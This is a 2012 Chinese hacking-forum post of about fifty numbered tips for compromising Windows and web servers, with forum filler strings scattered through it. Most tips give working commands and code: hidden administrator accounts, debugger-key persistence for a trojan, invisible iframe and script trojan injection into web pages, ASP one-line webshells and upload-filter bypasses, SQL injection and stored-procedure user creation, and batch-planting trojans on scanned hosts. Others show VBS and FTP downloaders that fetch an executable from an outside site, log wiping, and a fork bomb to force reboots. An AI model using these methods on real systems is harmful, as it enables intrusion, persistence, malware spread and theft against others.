中国网络渗透测试联盟
标题:
一些笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:51
标题:
一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
$ {! @+ A/ c& j0 U( f' f
cacls C:\windows\system32 /G hqw20:R
8 q, I: N3 X) E
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
3 u |. U) B8 E6 n' R% H4 s
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
1 [3 a- n% Y/ Z, n9 M, j
- q5 D2 K ^9 [* N
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
- g: D" a9 z2 L
. [/ I8 D% N. O Q# z
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
4 @) t8 T7 T B+ J5 n) e
% L/ T, X& q& |+ `# ~. c v. r8 C' d
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
6 T- ^4 s. n, M6 d, \( P
- Z, s, X. l4 v! E! m/ s7 y1 D* J
5、利用INF文件来修改注册表
" C+ S) q" y9 C( ]+ w' _
[Version]
: f+ \% p. W o' O# q
Signature="$CHICAGO$"
( O) O, j; g0 Z, f
[Defaultinstall]
# v1 A" ]# l; X7 c" u
addREG=Ating
$ Z8 S$ C9 P) O) f* y2 r# @
[Ating]
' a! L6 b, @$ X0 G, V$ F9 k
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
# ^4 e$ [% V# Q* e
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
7 }2 I( u% p( H5 v S7 M9 R1 |
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
3 F5 i7 N0 v! q e0 n
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
: ^, H! l% w ^' Y( G h5 b
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
, J5 P% M+ b6 Q r; I5 N. e
HKEY_CURRENT_CONFIG 简写为 HKCC
: u) I j. b+ o, S5 @
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
: W8 U' a- p& [9 i7 ?. I6 ]
"1"这里代表是写入或删除注册表键值中的具体数据
2 B- M4 [3 M, _, w6 M# V% Z
$ E: ]6 T0 a7 e' I2 g# p
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
1 }* q* [, Y- p& r
多了一步就是在防火墙里添加个端口,然后导出其键值
% V. j# T: Q; P9 F) F- ?
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
4 P2 M" w, m) D3 t) ?3 `$ Z& ?, ?
* F9 p5 d, e. D! P
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
0 t% j K: a7 b1 p) }- L- ~% k9 w
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
% C. R8 m- Y9 {. F# n
8 r! F5 u. w* Y
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
) n1 L8 B, M1 a/ U' E. V6 W; v9 Y
+ k) r' U8 T4 v2 b: C
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
6 f; ]( E# }; S Y
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
( }6 X8 [, ~! N9 R
7 }0 H8 o2 P& g$ B2 R8 D
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
1 c6 L3 ^, ~6 V. o. p1 }
/ P2 f& t1 {9 Y/ e5 m4 T8 z
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
. Z9 a% b4 P- J7 i: Q) V& _' f# f
用法:xsniff –pass –hide –log pass.txt
. c: L; p) {8 d s1 Z* I: b
. \- ?# o9 A4 O5 f$ X. @& D
12、google搜索的艺术
# K, K% N$ H% S: b t8 C: q
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
4 `- z) E" H. H- `
或“字符串的语法错误”可以找到很多sql注入漏洞。
, d, U, \& Y' L( _& e' ?3 x' D5 S, H+ t
2 U. p; S4 ^; `" W- j& X
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
3 `5 U. `+ M6 H% A! R
( D0 |/ c% ]1 o
14、cmd中输入 nc –vv –l –p 1987
* @6 |- \9 v: @% ^) D8 m$ r1 _+ Y5 Q
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
; g+ h% o0 b" j% f5 G
: |# M$ y: t" P+ d
15、制作T++木马,先写个ating.hta文件,内容为
5 w2 G0 `1 a: a
<script language="VBScript">
# A G- n0 ~# y" o
set wshshell=createobject ("wscript.shell" )
0 D$ N, v# r, z; \9 [1 q
a=wshshell.run("你马的名称",1)
8 W' ^5 u) I/ k( N3 X$ J
window.close
4 o) \' v: ?4 r c8 C
</script>
|* W+ w7 b8 e$ X- |+ t
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
( ~7 o6 o! Y: b7 J. k: K& h
4 R. @- V; b5 r8 e$ y3 m: K( i* e
16、搜索栏里输入
' M" ?, p# o& d% |6 @9 G
关键字%'and 1=1 and '%'='
9 Y Z* R$ D- n, U
关键字%'and 1=2 and '%'='
/ z' ^; C7 D }3 [+ p' C0 R
比较不同处 可以作为注入的特征字符
& y! j# @& O: x% J1 ^
4 O) O0 D0 O6 E7 J
17、挂马代码<html>
: L m2 w$ L# n+ M# ?1 X- {) @
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
6 h3 n3 }! C% a/ Z$ h# j5 h
</html>
& S0 ~& g5 }: R5 B- _
# t+ I6 N$ k6 Z8 u8 k' ~
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
) C/ z$ ~2 n+ v
net localgroup administrators还是可以看出Guest是管理员来。
/ f' l. P" G# x, U# U7 K& J
* z- ^. ?$ O v
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
7 y# e" m( A1 _3 y# ?2 ?( a
用法: 安装: instsrv.exe 服务名称 路径
' Q. l; f2 s. ^0 u. E. u$ w
卸载: instsrv.exe 服务名称 REMOVE
, k5 c/ s6 B# m
+ J/ V3 Q/ W+ B0 I. N! V2 g
7 ]' X, H) B$ t. J4 C' `- ^
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
# F" |" L' w" R0 y. c0 U: p# W p% i
不能注入时要第一时间想到%5c暴库。
% J# U1 S0 X9 d# l% s: z) a
; A% [" E) T7 |" m
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
/ d# u0 L) u& e$ T3 L
: K0 X7 P9 {/ n. L+ e9 l* t/ R
23、缺少xp_cmdshell时
$ R, E: S. H/ ~- C1 A
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
3 x$ f# b* U5 ] U% G3 O
假如恢复不成功,可以尝试直接加用户(针对开3389的)
& V/ X! ?0 o1 j& M5 N. c
declare @o int
& S2 S0 P7 H) p6 N1 M. \
exec sp_oacreate 'wscript.shell',@o out
7 r" V u" E8 T
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
1 d/ x5 j0 M7 H
6 S! \$ \7 C- x6 f
24.批量种植木马.bat
; p+ f4 q6 D% o5 c2 J# u! _' B# r
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
4 k, S* J7 ]4 D/ z( q
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
$ j0 L: f0 m7 j: t( ^5 E0 w
扫描地址.txt里每个主机名一行 用\\开头
# b6 o# o/ a- Q5 Y/ f0 K
. a7 g1 k/ d8 w
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
) f2 x) B" e, S6 h7 J# u
" |) m4 {$ [2 ]
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
1 e& k$ @! Y/ c1 e2 `' c
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
; A0 B8 I# E T4 p1 K% M" ]
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
, K9 i, K' b" z& \: p
( [0 t& i' P; U! @0 y7 U: H a
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
" t) r2 l7 g, B6 k5 C7 [' ^( F
然后用#clear logg和#clear line vty *删除日志
& L3 H# n/ r4 n
$ ^" p O4 N5 m* O
28、电脑坏了省去重新安装系统的方法
' p' R$ \$ G5 K/ L5 O
纯dos下执行,
) B+ c" a* y$ B7 [3 {9 x
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
2 O/ i ^! w5 d! J- B& i
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
% A8 I% N; j& n8 B/ f* C
4 T" k5 K+ B O( Q7 d
29、解决TCP/IP筛选 在注册表里有三处,分别是:
1 L( \1 f( |* P- O/ b! ~, Q
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
2 J, ]! v( J3 p% l
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
* e3 G6 T& @( B; s7 o7 t" S# A" D
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: H) t+ T( Z7 c: @
分别用
8 ^* o$ V5 ] k5 N
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 k7 C9 z! v: |
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 o. \7 n1 z; P+ }7 B9 w' g1 ]
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
3 e8 g& \/ ^$ N" m& j8 U
命令来导出注册表项
% @) ?: U2 W: {$ i3 l
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
8 \* ^+ d+ C& `" G, H' B
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
! y2 _5 k1 A7 M- [7 I/ z
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
! Z# W( H* x; f) | N+ D
# a+ p9 R( t) c7 ?5 p1 c7 e
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
+ K' V1 L% J. A( S( d
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
/ K; }8 H7 P4 J4 i3 C
' X8 L; m' l) I/ {! P3 a" a& `
31、全手工打造开3389工具
( T- ~( L; `1 i9 t* _6 F
打开记事本,编辑内容如下:
' s; z# d4 i9 v3 w' u4 L9 T
echo [Components] > c:\sql
; G2 ]6 x+ a9 B: ^/ O7 Y6 E/ o
echo TSEnable = on >> c:\sql
r/ ]( C+ z* d
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
2 @' Q3 g5 w8 S: g! W
编辑好后存为BAT文件,上传至肉鸡,执行
6 l, L+ {: r8 C2 D/ Q& k
' o+ S1 H% D0 ~; V
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
: C1 G0 D9 o" Z: v9 a h
0 E! B$ N% `- m6 n w5 R, F
33、让服务器重启
4 i# Y/ E$ @& l$ y# d. t: \1 ^
写个bat死循环:
$ E* a. g& {* k* g! ^
@echo off
@- X; w0 y' p2 P4 o7 U2 F3 {
:loop1
5 q/ L& N: O6 T$ b$ z
cls
9 C. L* i" \2 [# d1 r- h9 G
start cmd.exe
/ K F- c: `4 X: [
goto loop1
- R' s2 Y( ^1 [
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
" H. r: L6 t' x" ?& |
# P6 g. @1 t* @; S
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
- `9 _1 |, a$ b. t% O: @! P) u
@echo off
% v8 D. u4 `# T5 R& ?5 [4 D, K+ X
date /t >c:/3389.txt
: Q; b4 H$ p7 Z' D' ]1 `: p# ]- K
time /t >>c:/3389.txt
! r5 Y: ~% r8 Q' w5 G
attrib +s +h c:/3389.bat
$ l2 S* S$ k2 ?: ]; F9 X0 Y
attrib +s +h c:/3389.txt
0 H ~7 _$ }; d* K( W
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
, D& S' `) T, ~# k' N
并保存为3389.bat
0 X5 |- c6 D+ a3 }% R
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
. U( K6 n' V2 R$ W) B
& v' _* x; L% b# Z" ~) w$ D
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
% o% i4 F$ ]/ U: w+ e' E4 E
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
' z. V0 `. z* ]" [1 \* P: f2 q
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
% @8 r. o4 Z& {: f6 T* h0 M8 l J9 D
) e5 @5 ^$ @! e6 C
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
. g- Y4 _& o4 ?
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
3 d* v$ e1 o4 }0 [; M9 O
echo 你的FTP账号 >>c:\1.bat //输入账号
* V0 |" R P5 }2 T8 P' E' q# _
echo 你的FTP密码 >>c:\1.bat //输入密码
+ d% R* I! O( G7 M1 O' M
echo bin >>c:\1.bat //登入
& T( U5 |" P3 \6 ~9 N
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
+ B& L8 q( V0 Y9 C9 y
echo bye >>c:\1.bat //退出
5 c( k. H: |% ?1 b* S6 W7 }+ r
然后执行ftp -s:c:\1.bat即可
3 D" ?+ |: q* C) P/ f
- z4 M8 m ]) V1 H. B
37、修改注册表开3389两法
% }: k; z' n; ? c+ c# T
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
: k3 I* I; p: F6 S7 w* x
echo Windows Registry Editor Version 5.00 >>3389.reg
4 s( A$ X6 m, P2 k! c0 r/ ]5 [+ K7 Y% f
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
4 u: q5 F" U* G, d0 |& s
echo "Enabled"="0" >>3389.reg
2 P% f- i* | V8 I# m- A
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
* e* V! Z# b& c9 Q; G }+ g' {; T
NT\CurrentVersion\Winlogon] >>3389.reg
6 C9 m/ ?4 w4 H
echo "ShutdownWithoutLogon"="0" >>3389.reg
: K" L1 ?9 \! g4 X
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
! a T, ~9 Y: I- Q2 p
>>3389.reg
* u% B ^- p, e2 y0 K
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
# v' C1 f0 e u. G4 _" C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
' M, ?+ o$ }" t) C) f2 [
>>3389.reg
9 L& W' u: w+ {/ [3 ^6 Q! f; r- T' s
echo "TSEnabled"=dword:00000001 >>3389.reg
; i# T" l4 a2 ?; w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
- j Y* t: O0 F7 r$ k
echo "Start"=dword:00000002 >>3389.reg
7 @. y6 } Z6 m# [: w$ T9 k0 ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
& r4 Y, U3 J* L& R) I
>>3389.reg
8 K8 P) B. T7 h
echo "Start"=dword:00000002 >>3389.reg
. ~+ q0 j6 Z n. d% V9 Q
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- R% p' y9 s- H/ L
echo "Hotkey"="1" >>3389.reg
/ J% j+ t/ W7 i1 I! M2 ^% h( N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: ?' ]) E8 H5 P6 N* T9 J9 i, U
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
. r" [! ]8 D0 m$ @. F; W
echo "PortNumber"=dword:00000D3D >>3389.reg
8 k9 Z7 H/ h; y5 Q) r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: B9 S, k$ ^2 p6 Q+ f8 ?
Server\WinStations\RDP-Tcp] >>3389.reg
; T! d" A9 K2 J8 j9 v
echo "PortNumber"=dword:00000D3D >>3389.reg
$ p1 d' f, w- G, K+ J
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
7 j$ w O& |2 L- f9 u, Z' T
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
0 h( s. I; h) N7 p/ ?8 f
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
& c3 m( N% Y5 g& [& Q7 e5 ?
(2)winxp和win2003终端开启
$ H/ K% j* h) S' r7 L
用以下ECHO代码写一个REG文件:
: A2 ~ |' U8 U! U
echo Windows Registry Editor Version 5.00>>3389.reg
0 q9 C9 _$ s L0 M2 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' H8 h' |5 a2 ^/ J& o4 ^6 I9 F
Server]>>3389.reg
9 M$ e' \! P. X
echo "fDenyTSConnections"=dword:00000000>>3389.reg
% p* d4 x% U) Z3 L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# U/ q) D$ ~% g, S& ^: `
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
; _0 G" S$ ]. `& Y
echo "PortNumber"=dword:00000d3d>>3389.reg
4 m: S( H) n! o; v: P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 t5 q* |: b6 r1 [( P
Server\WinStations\RDP-Tcp]>>3389.reg
, {3 l- F% n8 ]
echo "PortNumber"=dword:00000d3d>>3389.reg
0 s" q5 |: ?* P- \& q
然后regedit /s 3389.reg del 3389.reg
: @! D. ?5 O- }% p8 w& A# h, }3 ]9 _
XP下不论开终端还是改终端端口都不需重启
5 ^& q0 K0 n2 J" n+ m: b1 u
* r5 k: ]3 Q. p
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
! _* W0 K' c1 x6 ~
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
" X; j3 [# I% g) N- ~5 m4 \; G4 D, `
( P. a. Z8 F% y; O4 @
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
7 e6 I7 _; O% }: W
(1)数据库文件名应复杂并要有特殊字符
$ F2 Y5 x3 E4 ~7 F A; K
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
! E" p! h) v! l K5 U: v7 q4 m
将conn.asp文档中的
% g7 h0 G, q& u8 s3 r2 h4 l X8 p
DBPath = Server.MapPath("数据库.mdb")
1 O8 E9 v% `* \! Q. _: ], _+ e
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
: w- n2 y; [- [; ]3 W* W6 h$ a$ p1 G$ O
, C8 W1 d9 i+ d L1 p% R7 d
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
3 C( B, S8 Z5 R7 h ?4 ^% P
(3)不放在WEB目录里
2 A+ M" i4 Y' x# ~, }+ a6 g
8 P+ V5 G. T4 O3 ^; B& T
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
8 ^+ i0 K+ ?3 o1 P
可以写两个bat文件
& ~, b2 [/ b& O1 i: R
@echo off
2 |. _ n0 L: v, U& X; w" j
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
4 h' h" }- l4 M
@del c:\winnt\system32\query.exe
0 ~% p+ t6 J! _# J/ ]4 j" g
@del %SYSTEMROOT%\system32\dllcache\query.exe
3 ^6 T1 ^- v2 Q/ B: k
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
1 W% j- Q: M: r& I0 M1 ?; W0 P' y5 x
, j n/ e" E( U" t( g0 T) K
@echo off
7 J2 ?$ }, N# b \; s
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
: h8 k0 j. y/ b) J* f3 R1 U
@del c:\winnt\system32\tsadmin.exe
# B) A. }0 o+ B2 A% n
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
) p, ?5 A. Q% u; {8 Q% Q
) v8 ?9 X. U! U" H
41、映射对方盘符
3 G! L+ u- p% ^
telnet到他的机器上,
& o# D) P3 Z- t2 S8 u5 r8 C
net share 查看有没有默认共享 如果没有,那么就接着运行
; S/ u4 ^. l0 S' Y" e% ?
net share c$=c:
2 j+ q& R, c) p0 V- @2 v4 h, ^% v
net share现在有c$
# {& ]. S' H! }6 O* C
在自己的机器上运行
+ Z1 s: W* B0 K& h M! ~
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
& m6 B8 a0 K/ @/ [3 y
$ Q# C' x5 j) X M8 v% L: ]# b
42、一些很有用的老知识
6 x. A- x" Y* s. F
type c:\boot.ini ( 查看系统版本 )
X; x9 H* x4 m W# [# O, _
net start (查看已经启动的服务)
6 ?% G. P# t0 \1 G
query user ( 查看当前终端连接 )
3 g1 J9 }9 @! T- w9 c. F8 {
net user ( 查看当前用户 )
( x( Y( I% f: z3 r
net user 用户 密码/add ( 建立账号 )
8 ~9 x! X6 ^- l* O; [/ A2 g
net localgroup administrators 用户 /add (提升某用户为管理员)
& x* E! S" v" x1 p
ipconfig -all ( 查看IP什么的 )
; I7 K9 o2 p$ x# x& t7 Y) s
netstat -an ( 查看当前网络状态 )
8 C; U* @4 Y6 H& J$ A
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
; {7 Y/ h2 z5 @9 `- T
克隆时Administrator对应1F4
( f$ c4 H/ M& e4 T
guest对应1F5
# V$ l$ ?' H( ^& w0 {
tsinternetuser对应3E8
# @0 ]4 a% P6 @6 B* b H, p
) x- _+ {7 y8 V2 s
43、如果对方没开3389,但是装了Remote Administrator Service
" u3 C* Y* \( i
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
1 }- u3 z' D# F& T& {: ^# L4 _
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
# z4 w+ I4 v# i5 q G& Y
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
2 z; b1 g2 f4 U* ~4 E2 K: O+ [+ D
' m- R, k% X5 |% [4 r
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
9 W/ n7 `* {0 [- [- l
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
/ p4 L0 D8 j( a7 R. @+ V7 `' I
3 n% B3 y. g& D6 r9 I
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
3 G1 p$ [4 q% M( T/ r; t- m
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
0 i" a& L* i+ L. S
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
3 o- |# y+ [* `1 x# C7 U6 |
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
, H: E) x$ k3 D7 D
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
! V: P! \8 o6 W1 z
(这是完整的一句话,其中没有换行符)
2 K( K* e+ J1 `1 e
然后下载:
! b ]6 n& H- ], C
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
$ K4 O* W5 P! B2 @7 A8 ?
/ [! V9 c/ n: e# ^8 q h
46、一句话木马成功依赖于两个条件:
3 P5 a! d# h6 e; e
1、服务端没有禁止adodb.Stream或FSO组件
+ p# C& U, E) T5 O3 N
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
, P7 x8 v. D! S7 X
( o, F5 ~6 H5 [" u6 Q4 b
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
! T+ C+ H' d( t1 v
;alter database utsz set RECOVERY FULL--
: b5 Y+ m! p- p1 K
;create table cmd (a image)--
" e; t7 z) \+ S' k7 c
;backup log utsz to disk = 'D:\cmd' with init--
$ J) k+ z9 h$ u+ A, p1 b0 l
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
; V; g( t7 I5 `% D* D1 e) I, Q, d
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
8 D1 a- c$ d" ?. s& S
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
" h! A! v3 y- h7 ~# V6 \
- N# ~( \! T: a d) x
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
3 U* V8 @$ v0 E6 y4 O! X
% Q+ |, o% ?/ N" E ~
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
- R# Y0 e3 _& f) C# C7 O
所有会话用 'all'。
$ {$ b# R/ }+ e/ B) Z4 P- `2 K$ t
-s sessionid 列出会话的信息。
: h+ `; x9 |" Z. H" A5 y" M0 s
-k sessionid 终止会话。
8 x. k C( B: A4 N
-m sessionid 发送消息到会话。
1 t% P' h# E z5 @$ R% v' C5 _
& w; w8 `! G/ \ h! m# \5 W
config 配置 telnet 服务器参数。
. p7 @3 Z$ z. |4 E; d: [, \# O7 @3 K
$ Q( C; ~# H# V5 |5 o- Q, m m) J
common_options 为:
( }' Z" ? |8 T7 R' N$ N+ |
-u user 指定要使用其凭据的用户
" |+ s+ m* t Y6 `, ~
-p password 用户密码
# K% b1 u. h1 \2 w% [# Q
5 p. ?! } D% W: s5 y: E
config_options 为:
9 R- M. v6 k& |# |8 o c. S
dom = domain 设定用户的默认域
9 u! M, O2 o- T' F9 `5 h& Y
ctrlakeymap = yes|no 设定 ALT 键的映射
3 f7 x" d% v! }5 ~. \
timeout = hh:mm:ss 设定空闲会话超时值
9 O1 E8 _* f( o+ s, ?& J7 J
timeoutactive = yes|no 启用空闲会话。
& m! z0 K0 x' J% l' \; U$ b& f8 Z
maxfail = attempts 设定断开前失败的登录企图数。
0 H) c0 f' s$ ^8 E y
maxconn = connections 设定最大连接数。
) B+ V9 V5 I! f% @: J& s: x8 ]6 c
port = number 设定 telnet 端口。
. e$ \! r! B. c# R
sec = [+/-]NTLM [+/-]passwd
8 O- s' h& z4 \3 E4 Y T) `. p
设定身份验证机构
' N0 L+ J+ R1 C2 s! D& ~! `
fname = file 指定审计文件名。
6 @" o0 P. X% a
fsize = size 指定审计文件的最大尺寸(MB)。
, Y/ b4 P. v t7 i
mode = console|stream 指定操作模式。
7 u2 I! Q$ q# ]5 b( f- p
auditlocation = eventlog|file|both
* |8 Z* F8 h" \% R2 `
指定记录地点
2 w4 s, N4 l' i/ ?. h5 G# {( V
audit = [+/-]user [+/-]fail [+/-]admin
8 e8 I6 w( d0 a6 ^
0 L8 c5 L u, T" Q1 E- @
49、例如:在IE上访问:
6 C* q: s! g8 w/ F4 F0 a
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
2 B: G5 ]. X3 q0 b& N; _* ?, |( d
hack.txt里面的代码是:
3 H4 ?6 L3 B7 Q' z/ z: l
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
+ X& F$ @) W, K Q/ M
把这个hack.txt发到你空间就可以了!
* q# I0 r( L) m: D% j1 s+ \0 [8 V
这个可以利用来做网马哦!
: y4 [2 Y5 R; E0 L
" s$ v, m" F0 w# A7 O$ B% }4 V: x
50、autorun的病毒可以通过手动限制!
1 C9 u+ g- v- i6 E8 o% L
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
: @2 g9 o6 e; c9 p5 s P
2,打开盘符用右键打开!切忌双击盘符~
( L6 D8 t$ k3 B1 c
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
' E; `0 K1 L: X$ \9 _
